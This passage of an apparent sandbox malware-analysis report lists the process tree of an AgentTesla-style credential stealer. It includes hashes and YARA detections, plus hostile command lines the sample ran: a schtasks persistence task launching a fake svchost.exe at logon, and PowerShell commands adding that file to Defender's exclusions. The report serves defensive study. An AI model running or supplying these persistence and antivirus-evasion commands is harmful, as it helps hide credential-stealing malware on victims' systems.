Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff7df220000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 10:07:02
Start date: 26/04/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase: 0x7ff7df220000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:10:07:02
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                                                                                                                                                                                                  Imagebase:0x7ff64d530000
                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
                                                                                                                                                                                                                                                  Imagebase:0x7ff64d530000
                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

Target ID:13
Start time:10:07:03
Start date:26/04/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Imagebase:0x7ff7eceb0000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:10:07:03
Start date:26/04/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout 3
Imagebase:0x7ff6738f0000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:15
Start time:10:07:04
Start date:26/04/2024
Path:C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:0x153be690000
File size:912'780 bytes
MD5 hash:D797AAE1EAF481E9C887482192B84109
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 32%, ReversingLabs
Reputation:low
Has exited:true

Target ID:16
Start time:10:07:05
Start date:26/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:10:07:06
Start date:26/04/2024
Path:C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:0x1fc8d3b0000
File size:912'780 bytes
MD5 hash:D797AAE1EAF481E9C887482192B84109
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:18
Start time:10:07:06
Start date:26/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:10:07:07
Start date:26/04/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:10:07:07
Start date:26/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:10:07:07
Start date:26/04/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Imagebase:
File size:42'064 bytes
MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                  Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                  Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                  Start time:10:07:08
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                  File size:45'984 bytes
                                                                                                                                                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1487009646.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0x210000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                  Start time:10:07:09
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                  File size:42'064 bytes
                                                                                                                                                                                                                                                  MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                  Start time:10:07:09
Start date:26/04/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:0x7ff7df220000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:10:07:09
Start date:26/04/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
Imagebase:0x7ff611ba0000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:10:07:09
Start date:26/04/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:0x640000
File size:108'664 bytes
MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:32
Start time:10:07:09
Start date:26/04/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
Imagebase:0x7ff611ba0000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:10:07:09
Start date:26/04/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:0x4a0000
File size:108'664 bytes
MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:10:07:09
Start date:26/04/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
Imagebase:0x7ff611ba0000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:10:07:09
Start date:26/04/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
Imagebase:0x7ff611ba0000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:10:07:11
Start date:26/04/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:0x7ff7df220000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:38
Start time:10:07:16
Start date:26/04/2024
Path:C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:0x26bb2dc0000
File size:912'780 bytes
MD5 hash:D797AAE1EAF481E9C887482192B84109
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:39
Start time:10:07:16
Start date:26/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa70000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa40000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                                  Start time:10:07:20
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
